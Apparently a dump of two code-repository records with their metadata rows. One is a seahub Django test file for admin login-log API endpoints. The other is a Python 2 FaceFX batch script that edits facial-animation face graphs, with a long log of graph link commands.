| 37.859673 | 157 | 0.590306 | 3,203 | 27,789 | 4.918514 | 0.06088 | 0.05789 | 0.024883 | 0.031992 | 0.943506 | 0.935381 | 0.929542 | 0.917545 | 0.90504 | 0.883903 | 0 | 0.02107 | 0.310015 | 27,789 | 733 | 158 | 37.911323 | 0.800563 | 0.06499 | 0 | 0.785894 | 1 | 0.012594 | 0.188378 | 0.028885 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.010076 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d7d6c19b8642ba2ca04d256ffc567401db807538 | 3,497 | py | Python | tests/api/endpoints/admin/test_login_logs.py | weimens/seahub | 5ecf78ed7a2ddc72a23961804ee41be21c24893f | ["Apache-2.0"] | 420 | 2015-01-03T11:34:46.000Z | 2022-03-10T07:15:41.000Z | tests/api/endpoints/admin/test_login_logs.py | weimens/seahub | 5ecf78ed7a2ddc72a23961804ee41be21c24893f | ["Apache-2.0"] | 735 | 2015-01-04T21:22:51.000Z | 2022-03-31T09:26:07.000Z | tests/api/endpoints/admin/test_login_logs.py | weimens/seahub | 5ecf78ed7a2ddc72a23961804ee41be21c24893f | ["Apache-2.0"] | 379 | 2015-01-05T17:08:03.000Z | 2022-03-06T00:11:50.000Z |
import json
import time
import datetime
from django.urls import reverse
from seahub.test_utils import BaseTestCase
try:
from seahub.settings import LOCAL_PRO_DEV_ENV
except ImportError:
LOCAL_PRO_DEV_ENV = False
class LoginLogsTest(BaseTestCase):
def test_get_login_log(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.admin)
end_timestamp = time.time()
start_timestamp = end_timestamp - 7 * 24 * 60 * 60
start_time_str = datetime.datetime.fromtimestamp(start_timestamp).strftime('%Y-%m-%d')
end_time_str = datetime.datetime.fromtimestamp(end_timestamp).strftime('%Y-%m-%d')
para_str = '?start=%s&end=%s' % (start_time_str, end_time_str)
url = reverse('api-v2.1-admin-logs-login') + para_str
resp = self.client.get(url)
json_resp = json.loads(resp.content)
assert json_resp[0]['email'] == self.admin.email
def test_can_not_get_if_start_time_invalid(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.admin)
end_timestamp = time.time()
start_timestamp = end_timestamp - 7 * 24 * 60 * 60
start_time_str = datetime.datetime.fromtimestamp(start_timestamp).strftime('%Y-%m-%d')
end_time_str = datetime.datetime.fromtimestamp(end_timestamp).strftime('%Y-%m-%d')
para_str = '?star=%s&end=%s' % (start_time_str, end_time_str)
url = reverse('api-v2.1-admin-logs-login') + para_str
resp = self.client.get(url)
self.assertEqual(400, resp.status_code)
def test_can_not_get_if_end_time_invalid(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.admin)
end_timestamp = time.time()
start_timestamp = end_timestamp - 7 * 24 * 60 * 60
start_time_str = datetime.datetime.fromtimestamp(start_timestamp).strftime('%Y-%m-%d')
end_time_str = datetime.datetime.fromtimestamp(end_timestamp).strftime('%Y-%m-%d')
para_str = '?start=%s&en=%s' % (start_time_str, end_time_str)
url = reverse('api-v2.1-admin-logs-login') + para_str
resp = self.client.get(url)
self.assertEqual(400, resp.status_code)
def test_can_not_get_if_not_admin(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.user)
end_timestamp = time.time()
start_timestamp = end_timestamp - 7 * 24 * 60 * 60
start_time_str = datetime.datetime.fromtimestamp(start_timestamp).strftime('%Y-%m-%d')
end_time_str = datetime.datetime.fromtimestamp(end_timestamp).strftime('%Y-%m-%d')
para_str = '?start=%s&end=%s' % (start_time_str, end_time_str)
url = reverse('api-v2.1-admin-logs-login') + para_str
resp = self.client.get(url)
self.assertEqual(403, resp.status_code)
class AdminLoginLogsTest(BaseTestCase):
def test_get_logs(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.admin)
url = reverse('api-v2.1-admin-admin-login-logs')
resp = self.client.get(url)
json_resp = json.loads(resp.content)
assert json_resp['data'][0]['email'] == self.admin.email
def test_can_not_get_if_not_admin(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.user)
url = reverse('api-v2.1-admin-admin-login-logs')
resp = self.client.get(url)
self.assertEqual(403, resp.status_code)
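# Sketch (not part of the original test suite): the tests above build the
# ?start=...&end=... query string by hand with "%" formatting; an equivalent,
# hypothetical helper using urlencode would look like this.
from urllib.parse import urlencode

def build_login_logs_url(start_time_str, end_time_str):
    # Same endpoint name the tests use; only this helper function is new.
    query = urlencode({'start': start_time_str, 'end': end_time_str})
    return reverse('api-v2.1-admin-logs-login') + '?' + query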
| 31.504505 | 94 | 0.653131 | 493 | 3,497 | 4.369168 | 0.144016 | 0.051996 | 0.040854 | 0.051996 | 0.865367 | 0.865367 | 0.865367 | 0.865367 | 0.865367 | 0.865367 | 0 | 0.019985 | 0.227338 | 3,497 | 110 | 95 | 31.790909 | 0.777202 | 0 | 0 | 0.746667 | 0 | 0 | 0.08636 | 0.046325 | 0 | 0 | 0 | 0 | 0.08 | 1 | 0.08 | false | 0 | 0.093333 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d7f36446e604402082d624f583b764f499cb95a2 | 34,277 | py | Python | facefx_batch/ProcFaceGraph.py | AndreySibiryakov/tools | 2a78f3ebfac78841eb69b2aa771a2faa10b8d827 | ["MIT"] | 4 | 2017-08-15T12:17:21.000Z | 2020-03-11T19:11:11.000Z | facefx_batch/ProcFaceGraph.py | AndreySibiryakov/tools | 2a78f3ebfac78841eb69b2aa771a2faa10b8d827 | ["MIT"] | null | null | null | facefx_batch/ProcFaceGraph.py | AndreySibiryakov/tools | 2a78f3ebfac78841eb69b2aa771a2faa10b8d827 | ["MIT"] | 1 | 2020-06-21T00:41:13.000Z | 2020-06-21T00:41:13.000Z |
'''
Animation data structure
group
anim
curve
frame:value
'''
from FxStudio import *
from FxAnimation import *
# import AnalysisTextPreprocessor
# reload(AnalysisTextPreprocessor)
import os
from shutil import copyfile
import datetime
class ProcFaceGraph(object):
def __init__(self):
self.fx_path = ''
# {animset_name:animset_path}
self.fx_dir = ''
self.cmds_path = 'u:/face/facefx/facefx_path.txt'
self.target_dir = 'c:/SVN/content/facefx/chrs/'
self.proc_data = {}
self.pc = '_PC'
self.publ_ext = '.facefx_ingame'
self.failed_command = False
self.print_log = 'Commands applied:\n' + fx_command + '\n\n'
self.log_dir = 'u:/face/logs/'
# self.not_copied = ''
def set_console_vars(self):
issueCommand('set -n "po_bake_events_to_curves" -v "0";')
issueCommand('set -n "po_collapse_face_graph" -v "0";')
issueCommand('set -n "po_remove_anim_editor_only_data " -v "1";')
issueCommand('set -n "po_remove_phon_word_lists " -v "1";')
issueCommand('set -n "po_remove_mapping" -v "1";')
issueCommand('set -n "po_destination_dir" -v "%s";' % self.fx_dir)
# For silent, no popups mode
issueCommand('set -n "g_unattended" -v "1";')
def load_actor(self):
issueCommand('loadActor -file "%s"' % self.fx_path)
def save_actor(self):
issueCommand('saveActor -file "%s"' % self.fx_path)
def publish_actor_go(self):
issueCommand('publish -go;')
def read_cmds(self):
data = []
with open(self.cmds_path) as g:
for l in g:
line = l.strip().split("\t")
if len(line) > 1:
data.append(line)
return data
def proc_cmds(self):
data = self.read_cmds()
# d[0] chr name
# d[1] path to .facefx
for d in data:
if self.proc_data.get(d[1]):
self.proc_data[d[1]] += [d[0]]
elif os.path.exists(d[1]):
self.proc_data[d[1]] = [d[0]]
else:
                print '# Path does not exist', d[1]
def copy(self, names):
for name in names:
base_name = os.path.basename(self.fx_path).split('.')[0]
source_publ_path = os.path.join(
self.fx_dir, base_name + self.pc + self.publ_ext)
target_publ_path = os.path.join(
self.target_dir, name + self.publ_ext)
if os.path.exists(source_publ_path):
copyfile(source_publ_path, target_publ_path)
# self.print_log += 'Copied published file to ' + target_publ_path + '\n'
else:
                print '# Published path does not exist', source_publ_path
continue
def exec_command(self):
for c in fx_command.split('\n'):
if len(c) == 0:
continue
# Failed facefx commands return False
            # and True on success
if not issueCommand('%s' % c):
self.failed_command = True
def proc_facefx(self):
self.proc_cmds()
for path, names in self.proc_data.iteritems():
self.failed_command = False
self.fx_path = path
self.fx_dir = os.path.dirname(path)
self.load_actor()
self.set_console_vars()
self.exec_command()
if self.failed_command:
print '# Not saving file due to errors.'
self.print_log += 'Skipped ' + path + '\n'
continue
self.publish_actor_go()
self.save_actor()
self.print_log += 'Saved ' + path + '\n'
self.copy(names)
print self.print_log
self.write_log()
def write_log(self):
now = datetime.datetime.now()
log_name = now.strftime("%Y%m%d_%H-%M")
log_path = os.path.join(
self.log_dir, log_name + '_facegraph_update.log')
with open(log_path, 'w+') as fx:
fx.write(self.print_log)
fx_command = '''graph -editlink -from "surprise_up_suppressor" -to "surprise_up" -linkfn "corrective" -linkfnparams "Correction Factor=0.000000";
graph -editlink -from "Wonder" -to "surprise_eye_r" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "Wonder" -to "surprise_eye_l" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
'''
pf = ProcFaceGraph()
pf.proc_facefx()
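# Sketch of the expected facefx_path.txt layout (values below are made up).
# read_cmds() splits every line on tabs, and proc_cmds() reads column 0 as the
# character name and column 1 as the path to the .facefx actor, grouping
# characters that share one actor file under the same path:
#
#   anna<TAB>u:/face/facefx/actors/anna.facefx
#   miller<TAB>u:/face/facefx/actors/miller.facefx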
'''
Used fx commands log:
# Fixes sleep command
graph -addnode -nodetype "FxCombinerNode" -name "sleep" -nodex 9844 -nodey -5650;
graph -link -from "sleep" -to "Blink" -linkfn "linear";
# Fixes missing link for fear emotion
graph -link -from "fear_low_elements" -to "fear_jaw_L" -linkfn "linear";
# Decreases W, U pronounce
graph -editlink -from "phoneme_U" -to "phoneme_U_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "phoneme_W" -to "phoneme_W_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
# Wider mouth open. Worked well for Miller
graph -editlink -from "Normalized Power" -to "jaw_open_general" -linkfn "linear" -linkfnparams "m=0.7|b=0.000000";
# For Anna only due to separate up and down W and U phonemes
graph -editlink -from "Phoneme_W_up" -to "phoneme_W_up_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "phoneme_W" -to "phoneme_W_down_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "Phoneme_U_up" -to "phoneme_U_up_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "phoneme_U" -to "phoneme_U_down_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "Normalized Power" -to "jaw_open_general" -linkfn "linear" -linkfnparams "m=0.7|b=0.000000";
# add eye blink corrective setup
graph -addnode -nodetype "FxCombinerNode" -name "mocap_eye_depressor" -nodex -3273 -nodey 4699;
graph -addnode -nodetype "FxCombinerNode" -name "eye_emotions_depressor" -nodex -3273 -nodey 4699;
graph -link -from "Blink" -to "mocap_eye_depressor" -linkfn "linear";
graph -link -from "Blink" -to "eye_emotions_depressor" -linkfn "linear";
graph -link -from "mocap_eye_depressor" -to "Eyes_widen_Up_R" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eyes_widen_Up_L" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eyes_widen_Down_R" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eyes_widen_Down_L" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eye_Squint_Up_R" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eye_Squint_Up_L" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eye_Squint_Down_R" -linkfn "corrective";
graph -link -from "mocap_eye_depressor" -to "Eye_Squint_Down_L" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "sadness_eye_r" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "sadness_eye_l" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "fear_eye_l" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "fear_eye_r" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "anger_eye_r" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "anger_eye_l" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "disgust_eye_r" -linkfn "corrective";
graph -link -from "eye_emotions_depressor" -to "disgust_eye_l" -linkfn "corrective";
graph -unlink -from "Anger" -to "Blink";
graph -unlink -from "happy" -to "Blink";
graph -unlink -from "disgust_eye_r" -to "Blink";
# Cleanup after previous batch
graph -removenode -name "fear_eyes_depressor";
graph -removenode -name "suprise_eyes_supressor";
#Added control for mocap blinks over other mocap eye nodes
graph -addnode -nodetype "FxCombinerNode" -name "eye_l_movement_depressor" -nodex 10902 -nodey -5560;
graph -addnode -nodetype "FxCombinerNode" -name "eye_r_movement_depressor" -nodex 10040 -nodey -5093;
setName -facegraphnode -old "mocap_eye_depressor" -new "mocap_eye_l_depressor";
graph -addnode -nodetype "FxCombinerNode" -name "mocap_eye_r_depressor" -nodex -2874 -nodey 5000;
graph -unlink -from "Blink" -to "Eye_Up_R";
graph -unlink -from "Blink" -to "Eye_Up_L";
graph -unlink -from "Blink" -to "Eye_Down_L";
graph -unlink -from "Blink" -to "Eye_In_L";
graph -unlink -from "Blink" -to "Eye_Out_L";
graph -unlink -from "Blink" -to "Eye_Out_R";
graph -unlink -from "Blink" -to "Eye_In_R";
graph -unlink -from "Blink" -to "Eye_Down_R";
graph -unlink -from "mocap_eye_l_depressor" -to "Eye_Squint_Down_L";
graph -unlink -from "mocap_eye_l_depressor" -to "Eye_Squint_Up_L";
graph -unlink -from "mocap_eye_l_depressor" -to "Eyes_widen_Down_L";
graph -unlink -from "mocap_eye_l_depressor" -to "Eyes_widen_Up_L";
graph -link -from "eye_l_movement_depressor" -to "Eye_Up_L" -linkfn "corrective";
graph -link -from "eye_l_movement_depressor" -to "Eye_Down_L" -linkfn "corrective";
graph -link -from "eye_l_movement_depressor" -to "Eye_In_L" -linkfn "corrective";
graph -link -from "eye_l_movement_depressor" -to "Eye_Out_L" -linkfn "corrective";
graph -link -from "eye_r_movement_depressor" -to "Eye_Out_R" -linkfn "corrective";
graph -link -from "eye_r_movement_depressor" -to "Eye_In_R" -linkfn "corrective";
graph -link -from "eye_r_movement_depressor" -to "Eye_Down_R" -linkfn "corrective";
graph -link -from "eye_r_movement_depressor" -to "Eye_Up_R" -linkfn "corrective";
graph -link -from "mocap_eye_r_depressor" -to "Eyes_widen_Up_L" -linkfn "corrective";
graph -link -from "mocap_eye_r_depressor" -to "Eyes_widen_Down_L" -linkfn "corrective";
graph -link -from "mocap_eye_r_depressor" -to "Eye_Squint_Up_L" -linkfn "corrective";
graph -link -from "mocap_eye_r_depressor" -to "Eye_Squint_Down_L" -linkfn "corrective";
graph -link -from "Blink" -to "mocap_eye_r_depressor" -linkfn "linear";
graph -link -from "Blink_L" -to "mocap_eye_l_depressor" -linkfn "linear";
graph -link -from "Blink_R" -to "mocap_eye_r_depressor" -linkfn "linear";
graph -link -from "Blink_L" -to "eye_l_movement_depressor" -linkfn "linear";
graph -link -from "Blink_R" -to "eye_r_movement_depressor" -linkfn "linear";
graph -link -from "Blink" -to "eye_l_movement_depressor" -linkfn "linear";
graph -link -from "Blink" -to "eye_r_movement_depressor" -linkfn "linear";
# Correct eye in extreme interest
graph -link -from "Eye_Out_R" -to "Eye_In_L" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "Eyeball_R_Out" -to "Eyeball_L_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "Eye_Out_L" -to "Eye_In_R" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "Eyeball_L_Out" -to "Eyeball_R_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
# Replaced eye correction on self depression
graph -unlink -from "Eye_Out_R" -to "Eye_In_L";
graph -unlink -from "Eyeball_R_Out" -to "Eyeball_L_In";
graph -unlink -from "Eye_Out_L" -to "Eye_In_R";
graph -unlink -from "Eyeball_L_Out" -to "Eyeball_R_In";
graph -addnode -nodetype "FxCombinerNode" -name "eye_in_depressor" -nodex -7476 -nodey 4909;
graph -addnode -nodetype "FxCombinerNode" -name "eye_in_constant_depressor" -nodex -7623 -nodey 5000;
graph -link -from "eye_in_constant_depressor" -to "eye_in_depressor" -linkfn "linear";
graph -editlink -from "eye_in_constant_depressor" -to "eye_in_depressor" -linkfn "linear" -linkfnparams "m=-1|b=1";
graph -link -from "eye_in_depressor" -to "Eye_In_R" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "eye_in_depressor" -to "Eyeball_R_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "eye_in_depressor" -to "Eye_In_L" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
graph -link -from "eye_in_depressor" -to "Eyeball_L_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.38";
#Increased correction value for inner eyes for test purposes
graph -editlink -from "eye_in_depressor" -to "Eye_In_L" -linkfn "corrective" -linkfnparams "Correction Factor=0.5";
graph -editlink -from "eye_in_depressor" -to "Eye_In_R" -linkfn "corrective" -linkfnparams "Correction Factor=0.5";
graph -editlink -from "eye_in_depressor" -to "Eyeball_L_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.5";
graph -editlink -from "eye_in_depressor" -to "Eyeball_R_In" -linkfn "corrective" -linkfnparams "Correction Factor=0.5";
# Added mocap depressor while facefx phrases playing
graph -addnode -nodetype "FxCombinerNode" -name "facefx_to_mocap_depressor" -nodex -3643 -nodey 5833;
graph -addnode -nodetype "FxCombinerNode" -name "mocap_low_face_depressor" -nodex -3730 -nodey 5747;
graph -link -from "facefx_to_mocap_depressor" -to "mocap_eye_r_depressor" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "facefx_to_mocap_depressor" -to "mocap_eye_l_depressor" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -link -from "facefx_to_mocap_depressor" -to "mocap_low_face_depressor" -linkfn "linear" -linkfnparams "m=0.8|b=0.000000";
graph -link -from "mocap_low_face_depressor" -to "Mouth_swing_right" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Mouth_swing_left" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Corner_depress_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Corner_depress_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lips_Purse" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lips_funneler" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Jaw_Right" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Jaw_Left" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Jaw_Forwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Jaw_Backwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nostril_Flare_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nostril_Flare_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nostril_Compress_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nose_Down_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nose_Down_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Chin_Upwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Cheeks_Blow_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Cheeks_Blow_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Cheek_Raiser_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Cheek_Raiser_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Teeth_Right" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Teeth_Left" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Teeth_Forwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Teeth_Backwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Nostril_Compress_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Wide" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Up" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Rolled_Up" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Rolled_Down" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Pressed_Upwards" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Narrow" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_In" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Tongue_Down" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Up_Pinch_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Up_Pinch_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Up_Open_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Up_Open_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Lower_Up_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Lower_Up_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Lower_Down_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Lower_Down_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Down_Pinch_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Down_Pinch_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Down_Open_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Down_Open_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Upper_Up_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "Lip_Upper_Up_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipLowerDown_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipLowerDown_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthPress_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthPress_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthFrown_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthFrown_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthDimple_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "MouthDimple_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsUpperUp_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsUpperUp_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsUpperClose" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsStretch_R" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsStretch_L" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
graph -link -from "mocap_low_face_depressor" -to "LipsLowerClose" -linkfn "corrective" -linkfnparams "Correction Factor=1.0";
# Added suppression of faceshift animation while playing facefx phrases
graph -addnode -nodetype "FxCombinerNode" -name "mocap_emotions_depressor" -nodex 9507 -nodey 9163;
graph -link -from "mocap_emotions_depressor" -to "smile_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "smile_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "smile_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "smile_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "surprise_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "surprise_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "surprise_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "surprise_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "anger_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "anger_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "anger_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "sadness_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "sadness_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "sadness_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "sadness_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "anger_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "happiness_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "happinessP_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "happinessP_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "happiness_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "disgust_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "disgust_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "disgust_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "disgust_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "fear_low_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "fear_eye_r_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "fear_eye_l_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "fear_up_elements" -linkfn "corrective";
graph -link -from "mocap_emotions_depressor" -to "phoneme_P_delta_elements" -linkfn "corrective";
graph -link -from "facefx_to_mocap_depressor" -to "mocap_emotions_depressor" -linkfn "linear";
graph -link -from "Wonder" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Smile" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Anger" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Fear" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Wide_Smile" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Sadness" -to "mocap_emotions_depressor" -linkfn "corrective";
graph -link -from "Disgust" -to "mocap_emotions_depressor" -linkfn "corrective";
# Suppresses mocap eye blink while playing facefx phrases
